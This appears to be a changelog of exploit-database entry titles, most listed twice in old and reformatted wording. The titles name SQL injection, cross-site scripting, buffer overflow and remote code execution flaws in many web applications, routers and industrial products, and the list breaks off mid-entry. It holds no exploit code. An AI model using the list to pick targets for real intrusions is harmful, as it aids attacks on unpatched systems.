FM114P ProSafe Wireless Router - UPnP Information Disclosure NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure Netgear FM114P ProSafe Wireless Router - Rule Bypass NETGEAR FM114P ProSafe Wireless Router - Rule Bypass M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Cross-Site Scripting M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Cross-Site Scripting Microsoft Internet Explorer 6 -' %USERPROFILE%' File Execution Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution EZMeeting 3.x - EZNet.exe Long HTTP Request Remote Buffer Overflow EZMeeting 3.x - 'EZNet.exe' Long HTTP Request Remote Buffer Overflow Enterasys NetSight - nssyslogd.exe Buffer Overflow (Metasploit) IBM Cognos - tm1admsd.exe Overflow (Metasploit) Enterasys NetSight - 'nssyslogd.exe' Buffer Overflow (Metasploit) IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit) Webcam Corp Webcam Watchdog 4.0.1 - sresult.exe Cross-Site Scripting Webcam Corp Webcam Watchdog 4.0.1 - 'sresult.exe' Cross-Site Scripting Microsoft Windows XP/2000/2003 -'winhlp32' Phrase Integer Overflow Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow Oracle 8.x/9.x/10.x - Database Multiple SQL Injection Oracle 8.x/9.x/10.x Database - Multiple SQL Injections SAP Business Connector 4.6/4.7 - chopSAPLog.dsp fullName Variable Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - deleteSingle fullName Variable Arbitrary File Deletion SAP Business Connector 4.6/4.7 - adapter-index.dsp url Variable Arbitrary Site Redirect SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp' 'fullName' Parameter Arbitrary File Disclosure SAP Business Connector 4.6/4.7 - 'deleteSingle' 'fullName' Parameter Arbitrary File Deletion SAP Business Connector 4.6/4.7 - 'adapter-index.dsp' 'url' Parameter Arbitrary Site Redirect Microsoft PowerPoint 2003 - powerpnt.exe Unspecified Issue Microsoft PowerPoint 2003 - 'powerpnt.exe' Unspecified Issue Cruiseworks 1.09 - Cws.exe Doc Directory Traversal Cruiseworks 1.09 - Cws.exe Doc Buffer Overflow Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow aBitWhizzy - whizzypic.php d Variable Traversal Arbitrary Directory Listing aBitWhizzy - 'whizzypic.php' 'd' ParameterTraversal Arbitrary Directory Listing LANDesk Management Suite 8.7 Alert Service - AOLSRVR.exe Buffer Overflow LANDesk Management Suite 8.7 Alert Service - 'AOLSRVR.exe' Buffer Overflow Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow ABB MicroSCADA - wserver.exe Remote Code Execution (Metasploit) ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit) SAP DB 7.x Web Server - WAHTTP.exe Multiple Buffer Overflow Vulnerabilities SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities Cisco User-Changeable Password (UCP) 3.3.4.12.5 - CSUserCGI.exe Help Facility Cross-Site Scripting Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSUserCGI.exe' Help Facility Cross-Site Scripting HP OpenView Network Node Manager (OV NNM) 7.x -OpenView5.exe Action Parameter Traversal Arbitrary File Access HP OpenView Network Node Manager (OV NNM) 7.x - 'OpenView5.exe' Action Parameter Traversal Arbitrary File Access F5 FirePass 6.0.2.3 - /vdesk/admincon/webyfiers.php css_exceptions Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - /vdesk/admincon/index.php sql_matchscope Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/webyfiers.php' 'css_exceptions' Parameter Cross-Site Scripting F5 FirePass 6.0.2.3 - '/vdesk/admincon/index.php' 'sql_matchscope' Parameter Cross-Site Scripting GE Proficy CIMPLICITY - gefebt.exe Remote Code Execution (Metasploit) GE Proficy CIMPLICITY - 'gefebt.exe' Remote Code Execution (Metasploit) SolidWorks Workgroup PDM 2014 - pdmwService.exe Arbitrary File Write (Metasploit) SolidWorks Workgroup PDM 2014 - 'pdmwService.exe' Arbitrary File Write (Metasploit) Yokogawa CENTUM CS 3000 - BKHOdeq.exe Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - BKBCopyD.exe Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - 'BKHOdeq.exe' Buffer Overflow (Metasploit) Yokogawa CENTUM CS 3000 - 'BKBCopyD.exe' Buffer Overflow (Metasploit) Apache Geronimo 2.1.x - /console/portal/Server/Monitoring Multiple Parameter Cross-Site Scripting Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Parameter Cross-Site Scripting Comtrend CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /diagnose Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /configuration Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - /scripter.php Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Parameter Cross-Site Scripting Juniper Junos 8.5/9.0 J-Web Interface - '/scripter.php' Multiple Parameter Cross-Site Scripting Yokogawa CS3000 - BKESimmgr.exe Buffer Overflow (Metasploit) Yokogawa CS3000 - 'BKESimmgr.exe' Buffer Overflow (Metasploit) Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit) Yokogawa CS3000 - 'BKFSim_vhfd.exe' Buffer Overflow (Metasploit) U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection U.S.Robotics USR5463 0.06 Firmware - 'setup_ddns.exe' HTML Injection WhatsApp 2.11.476 - Remote Reboot/Crash App Android Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu.maf jdeowpBackButtonProtect Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_Menu.mafService e1.namespace Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_OCL.mafService e1.namespace Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/MafletClose.mafService RENDER_MAFLET Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter Cross-Site Scripting WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service) Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting Linksys WRT54GL (Wireless Router) - Cross-Site Request Forgery Linksys WRT54GL Wireless Router - Cross-Site Request Forgery Cisco Linksys E4200 - /apply.cgi Multiple Parameter Cross-Site Scripting Cisco Linksys E4200 - '/apply.cgi' Multiple Parameter Cross-Site Scripting Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution Comtrend CT-5361T Router - Password.cgi Cross-Site Request Forgery (Admin Password Manipulation) COMTREND CT-5361T Router - 'Password.cgi' Cross-Site Request Forgery (Admin Password Manipulation) Alfresco - /proxy endpoint Parameter Server-Side Request Forgery Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery PhpTagCool 1.0.3 - SQL Injection Attacks Exploit PhpTagCool 1.0.3 - SQL Injection phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2) phpBB 2.0.18 - Remote Brute Force/Dictionary (2) Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Yrch 1.0 - 'plug.inc.php path Variable' Remote File Inclusion Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection iG Calendar 1.0 - 'user.php id Variable' SQL Injection iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection MGB 0.5.4.5 - 'email.php id Variable' SQL Injection MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection Alstrasoft e-Friends 4.98 - (seid) Multiple SQL Injection Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections MyPHP Forum 3.0 - (Final) Multiple SQL Injection MyPHP Forum 3.0 (Final) - Multiple SQL Injections File Store PRO 3.2 - Multiple Blind SQL Injection File Store PRO 3.2 - Multiple Blind SQL Injections AssetMan 2.5-b - SQL Injection using Session Fixation Attack AssetMan 2.5-b - SQL Injection using Session Fixation Kasra CMS - 'index.php' Multiple SQL Injection Kasra CMS - 'index.php' Multiple SQL Injections NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injection NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections T-HTB Manager 0.5 - Multiple Blind SQL Injection T-HTB Manager 0.5 - Multiple Blind SQL Injections Joomla! Component com_oziogallery2 - / IMAGIN Arbitrary file write Joomla! Component com_oziogallery2 / IMAGIN - Arbitrary File Write Open Bulletin Board - Multiple Blind SQL Injection Open Bulletin Board - Multiple Blind SQL Injections AJ Matrix 3.1 - 'id' Multiple SQL Injection AJ Matrix 3.1 - 'id' Multiple SQL Injections Zylone IT - Multiple Blind SQL Injection Zylone IT - Multiple Blind SQL Injections WhiteBoard 0.1.30 - Multiple Blind SQL Injection WhiteBoard 0.1.30 - Multiple Blind SQL Injections AV Arcade 3 - Cookie SQL Injection Authentication Bypass AV Arcade 3 - Cookie SQL Injection / Authentication Bypass Joomla! Component Teams - Multiple Blind SQL Injection Joomla! Component Teams - Multiple Blind SQL Injections AneCMS - /registre/next SQL Injection AneCMS - '/registre/next' SQL Injection Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injection Joomla! Component JE FAQ Pro 1.5.0 - Multiple Blind SQL Injections Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections ColdOfficeView 2.04 - Multiple Blind SQL Injection ColdOfficeView 2.04 - Multiple Blind SQL Injections Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injections Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injection Ananda Real Estate 3.4 - 'list.asp' Multiple SQL Injections Projekt Shop - 'details.php' Multiple SQL Injection Projekt Shop - 'details.php' Multiple SQL Injections PixelPost 1.7.3 - Multiple POST Variables SQL Injection PixelPost 1.7.3 - Multiple POST Parameter SQL Injections Webcat - Multiple Blind SQL Injection Webcat - Multiple Blind SQL Injections LiteRadius 3.2 - Multiple Blind SQL Injection LiteRadius 3.2 - Multiple Blind SQL Injections PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injection PG eLms Pro vDEC_2007_01 - Multiple Blind SQL Injections Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit COMTREND CT-5624 Router - Root/Support Password Disclosure/Change Exploit Sagem F@ST 2604 (ADSL Router) - Cross-Site Request Forgery Sagem F@ST 2604 ADSL Router - Cross-Site Request Forgery Rivettracker 1.03 - Multiple SQL Injection Rivettracker 1.03 - Multiple SQL Injections ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injection ArticleSetup - Multiple Persistence Cross-Site Scripting / SQL Injections PHP Ticket System Beta 1 - 'index.php p Parameter' SQL Injection PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection X-Cart Gold 4.5 - 'products_map.php symb Parameter' Cross-Site Scripting X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting Symantec Web Gateway 5.0.2 - 'blocked.php id Parameter' Blind SQL Injection Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid Parameter' Blind SQL Injection Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injection Openconstructor CMS 3.12.0 - 'id' Parameter Multiple SQL Injections YourArcadeScript 2.4 - 'index.php id Parameter' SQL Injection YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection QNAP Turbo NAS TS-1279U-RP - Multiple Path Injection QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections Blog Mod 0.1.9 - 'index.php month Parameter' SQL Injection Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection Authoria HR Suite - AthCGI.exe Cross-Site Scripting Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting MyBB Profile Albums Plugin 0.9 - 'albums.php album Parameter' SQL Injection MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection M-TECH P-Synch 6.2.5 - nph-psf.exe css Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion friendsinwar FAQ Manager - SQL Injection (Authentication Bypass) friendsinwar FAQ Manager - SQL Injection / Authentication Bypass friendsinwar FAQ Manager - 'view_faq.php question Parameter' SQL Injection friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection SmartCMS - 'index.php idx Parameter' SQL Injection SmartCMS - 'index.php' 'idx' Parameter SQL Injection SmartCMS - 'index.php menuitem Parameter' SQL Injection / Cross-Site Scripting SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injections MyBB AwayList Plugin - 'index.php id Parameter' SQL Injection MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection PHP-Nuke Error Manager Module 2.1 - error.php language Variable Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - error.php Multiple Variables Cross-Site Scripting PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Parameters Cross-Site Scripting phpHeaven phpMyChat 0.14.5 - edituser.php3 do_not_login Variable Authentication Bypass phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass NConf 1.3 - 'detail.php detail_admin_items.php id Parameter' SQL Injection NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection Gattaca Server 2003 - Language Variable Path Exposure Gattaca Server 2003 - 'Language' Parameter Path Exposure AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injection AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injections Scripts Genie Gallery Personals - 'gallery.php L Parameter' SQL Injection Scripts Genie Gallery Personals - 'gallery.php' L' Parameter SQL Injection AdaptCMS 2.0.4 - 'config.php question Parameter' SQL Injection AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection Scripts Genie Domain Trader - 'catalog.php id Parameter' SQL Injection Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection Scripts Genie Games Site Script - 'index.php id Parameter' SQL Injection Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection Scripts Genie Top Sites - 'out.php id Parameter' SQL Injection Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php cid Parameter' SQL Injection Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id Parameter' SQL Injection PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection MTP Image Gallery 1.0 - 'edit_photos.php title Parameter' Cross-Site Scripting MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting D-Link DSL-2740B (ADSL Router) - Authentication Bypass D-Link DSL-2740B ADSL Router - Authentication Bypass TIPS MailPost 5.1.1 - APPEND Variable Cross-Site Scripting TIPS MailPost 5.1.1 - 'APPEND' Parameter Cross-Site Scripting DUclassified 4.x - adDetail.asp Multiple Parameter SQL Injection DUclassified 4.x - 'adDetail.asp' Multiple Parameter SQL Injections Rebus:list - 'list.php list_id Parameter' SQL Injection Rebus:list - 'list.php' 'list_id' Parameter SQL Injection SynConnect Pms - 'index.php loginid Parameter' SQL Injection SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection AWS Xms 2.5 - 'importer.php what Parameter' Directory Traversal Pollen CMS 0.6 - 'index.php p Parameter' Local File Disclosure AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal Pollen CMS 0.6 - 'index.php' 'p' Paramete' Local File Disclosure WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash Parameter' SQL Injection WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash Parameter SQL Injection Kayako eSupport 2.x - Ticket System Multiple SQL Injection Kayako eSupport 2.x - Ticket System Multiple SQL Injections BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection BibORB 1.3.2 Login Module - Multiple Parameter SQL Injections Active Auction House - default.asp Multiple SQL Injection Active Auction House - 'default.asp' Multiple SQL Injections CubeCart 2.0.x - 'index.php' Multiple Variable Full Path Disclosure CubeCart 2.0.x - tellafriend.php product Variable Full Path Disclosure CubeCart 2.0.x - view_cart.php add Variable Full Path Disclosure CubeCart 2.0.x - view_product.php product Variable Full Path Disclosure CubeCart 2.0.x - 'index.php' Multiple Parameter Full Path Disclosure CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure OneWorldStore - 'OWListProduct.asp' Multiple SQL Injection OneWorldStore - 'OWListProduct.asp' Multiple SQL Injections WHMCS 4.x - 'invoicefunctions.php id Parameter' SQL Injection WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection DUportal Pro 3.4 - default.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - 'default.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - inc_vote.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - result.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - cat.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - detail.asp Multiple Parameter SQL Injection DUportal Pro 3.4 - 'inc_vote.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'result.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'cat.asp' Multiple Parameter SQL Injections DUportal Pro 3.4 - 'detail.asp' Multiple Parameter SQL Injections DUportal 3.1.2 - inc_rating.asp Multiple Parameter SQL Injection DUportal 3.1.2 - 'inc_rating.asp' Multiple Parameter SQL Injections StorePortal 2.63 - default.asp Multiple SQL Injection StorePortal 2.63 - 'default.asp' Multiple SQL Injections MetaCart2 - SearchAction.asp Multiple SQL Injection MetaCart2 - 'SearchAction.asp' Multiple SQL Injections Claroline E-Learning 1.5/1.6 - userInfo.php Multiple Parameter SQL Injection Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple Parameter SQL Injections JGS-Portal 3.0.1 - ID Variable SQL Injection JGS-Portal 3.0.1 - 'ID' Parameter SQL Injection AVE.CMS 2.09 - 'index.php module Parameter' Blind SQL Injection AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection RadioCMS 2.2 - 'menager.php playlist_id Parameter' SQL Injection RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection NPDS 4.8 - /5.0 modules.php Lettre Parameter Cross-Site Scripting NPDS 4.8 /5.0 - 'modules.php' Lettre Parameter Cross-Site Scripting Ampache 3.4.3 - 'login.php' Multiple SQL Injection Ampache 3.4.3 - 'login.php' Multiple SQL Injections FlatNuke 2.5.x - 'index.php' where Variable Full Path Disclosure FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure CarLine Forum Russian Board 4.2 - reply_in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - memory.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection CarLine Forum Russian Board 4.2 - 'memory.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'line.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'in.php' Multiple Parameter SQL Injections CarLine Forum Russian Board 4.2 - 'enter.php' Multiple Parameter SQL Injections osTicket 1.2/1.3 - view.php inc Variable Arbitrary Local File Inclusion osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion Ruubikcms 1.1.1 - 'tinybrowser.php folder Parameter' Directory Traversal Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal Simple PHP Agenda 2.2.8 - 'edit_event.php eventid Parameter' SQL Injection Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection PHPFreeNews 1.40 - searchresults.php Multiple SQL Injection PHPFreeNews 1.40 - searchresults.php Multiple SQL Injections Aenovo - /Password/default.asp Password Field SQL Injection Aenovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection Aenovo - '/Password/default.asp' Password Field SQL Injection Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php Multiple Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertitle.php usertitleid Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/usertools.php ids Parameter SQL Injection NooToplist 1.0 - 'index.php' Multiple SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - /admincp/css.php group Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/index.php Multiple Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/user.php email Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/language.php goto Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter Cross-Site Scripting MX Shop 3.2 - 'index.php' Multiple SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection NooToplist 1.0 - 'index.php' Multiple SQL Injections vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/template.php' Multiple Parameter Cross-Site Scripting MX Shop 3.2 - 'index.php' Multiple SQL Injections Top Games Script 1.2 - 'play.php gid Parameter' SQL Injection Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection Elemata CMS RC3.0 - 'global.php id Parameter' SQL Injection Elemata CMS RC3.0 - 'global.php' 'id' Parameter SQL Injection Woltlab 1.1/2.x - Info-DB Info_db.php Multiple SQL Injection Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections OaBoard 1.0 - forum.php Multiple SQL Injection OaBoard 1.0 - 'forum.php' Multiple SQL Injections Comersus Backoffice 4.x/5.0/6.0 - /comersus/database/comersus.mdb Direct Request Database Disclosure Comersus Backoffice 4.x/5.0/6.0 - '/comersus/database/comersus.mdb' Direct Request Database Disclosure PHP-Charts 1.0 - 'index.php type Parameter' Remote Code Execution PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting Walla TeleSite 3.0 - ts.exe tsurl Variable Arbitrary Article Access Walla TeleSite 3.0 - ts.exe sug Parameter Cross-Site Scripting Walla TeleSite 3.0 - ts.exe sug Parameter SQL Injection Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection Pearl Forums 2.0 - 'index.php' Multiple SQL Injection Pearl Forums 2.0 - 'index.php' Multiple SQL Injections Helpdesk Issue Manager 0.x - find.php Multiple Parameter SQL Injection Helpdesk Issue Manager 0.x - 'find.php' Multiple Parameter SQL Injection PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injection Cars Portal 1.1 - 'index.php' Multiple SQL Injection PluggedOut Blog 1.9.x - 'index.php' Multiple SQL Injections Cars Portal 1.1 - 'index.php' Multiple SQL Injections IceWarp Universal WebMail - /accounts/inc/include.php Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - /admin/inc/include.php Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - /dir/include.html lang Parameter Local File Inclusion IceWarp Universal WebMail - /mail/settings.html Language Parameter Local File Inclusion IceWarp Universal WebMail - /mail/index.html lang_settings Parameter Remote File Inclusion IceWarp Universal WebMail - /mail/include.html Crafted HTTP_USER_AGENT Arbitrary File Access IceWarp Universal WebMail - '/accounts/inc/include.php' Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - '/admin/inc/include.php' Multiple Parameter Remote File Inclusion IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion IceWarp Universal WebMail - '/mail/include.html' Crafted HTTP_USER_AGENT Arbitrary File Access PHPJournaler 1.0 - Readold Variable SQL Injection PHPJournaler 1.0 - 'Readold' Parameter SQL Injection ScozNet ScozBook 1.1 - AdminName Variable SQL Injection ScozNet ScozBook 1.1 - 'AdminName' Parameter SQL Injection OnePlug CMS - /press/details.asp Press_Release_ID Parameter SQL Injection OnePlug CMS - /services/details.asp Service_ID Parameter SQL Injection OnePlug CMS - /products/details.asp Product_ID Parameter SQL Injection OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection OnePlug CMS - '/services/details.asp' 'Service_ID' Parameter SQL Injection OnePlug CMS - 